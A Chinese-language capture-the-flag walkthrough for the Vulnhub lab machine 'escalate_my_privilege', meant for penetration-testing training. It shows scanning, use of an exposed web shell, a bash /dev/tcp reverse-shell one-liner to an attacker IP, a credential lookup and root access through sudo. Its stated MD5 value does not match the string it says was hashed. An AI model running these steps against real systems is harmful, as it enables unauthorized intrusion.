初试vulnhub靶场 escalate_my_privilege
字数 1100 2025-08-15 21:30:47
Vulnhub靶场:escalate_my_privilege 渗透测试教学文档
靶场概述
escalate_my_privilege是Vulnhub平台提供的一个基础渗透测试靶机,主要训练Linux系统渗透测试的基本技能,包括:
- 信息收集
- Web应用漏洞利用
- 权限提升技术
- Linux命令操作熟练度
环境准备
- 从Vulnhub下载靶机镜像:https://www.vulnhub.com
- 使用VMware或VirtualBox导入虚拟机
- 启动靶机,记下分配的IP地址(通常显示在启动画面上)
渗透测试步骤
1. 信息收集
网络扫描:
nmap -sV -p- <靶机IP>
发现开放端口:
- 22/tcp - SSH服务
- 80/tcp - HTTP服务
Web目录扫描:
dirb http://<靶机IP> /usr/share/wordlists/dirb/common.txt
发现关键文件:phpbash.php
2. 漏洞利用
Web Shell访问:
访问 http://<靶机IP>/phpbash.php 发现一个可执行命令的Web Shell
反弹Shell建立:
在攻击机上监听:
nc -lvnp 4444
在Web Shell中执行:
bash -i >& /dev/tcp/<攻击机IP>/4444 0>&1
3. 横向移动
查找凭证:
cd /home/armour
cat Credentials.txt
文件内容提示:rootroot1 的MD5哈希就是armour用户的密码
生成密码:
echo -n "rootroot1" | md5sum
得到MD5哈希:63a9f0ea7bb98050796b649e85481845
切换用户:
su armour
密码:63a9f0ea7bb98050796b649e85481845
4. 权限提升
方法一:sudo提权
sudo /bin/bash
直接获取root权限
方法二:利用crontab(备选)
检查root用户的定时任务:
cat /etc/crontab
如果有以root权限运行的可写脚本,可以修改该脚本获取root权限
5. 获取flag
成功提权后,在/root目录下查找flag文件:
cd /root
ls
cat flag.txt 或 cat proof.txt
技术要点总结
- 信息收集重要性:通过目录扫描发现phpbash.php是关键突破口
- Web Shell利用:phpbash.php提供了直接命令执行能力
- 凭证破解:理解提示信息并正确生成MD5哈希
- 权限提升方法:
- 直接sudo提权是最简单的方式
- 通过crontab提权是常见备选方案
- Linux命令熟练度:整个渗透过程需要熟练掌握Linux基本命令
防御建议
- 避免在生产环境部署Web Shell测试页面
- 使用强密码策略,避免使用简单密码
- 定期审计sudo权限和crontab任务
- 最小化网络服务暴露面
- 实施适当的文件权限控制
扩展学习
- 尝试不使用phpbash.php,寻找其他攻击路径
- 探索其他提权方法(如SUID、内核漏洞等)
- 练习使用Metasploit框架完成相同目标
- 研究如何加固此类系统防止类似攻击
通过这个靶场,可以很好地训练基础的Linux系统渗透测试技能,为更复杂的渗透测试场景打下坚实基础。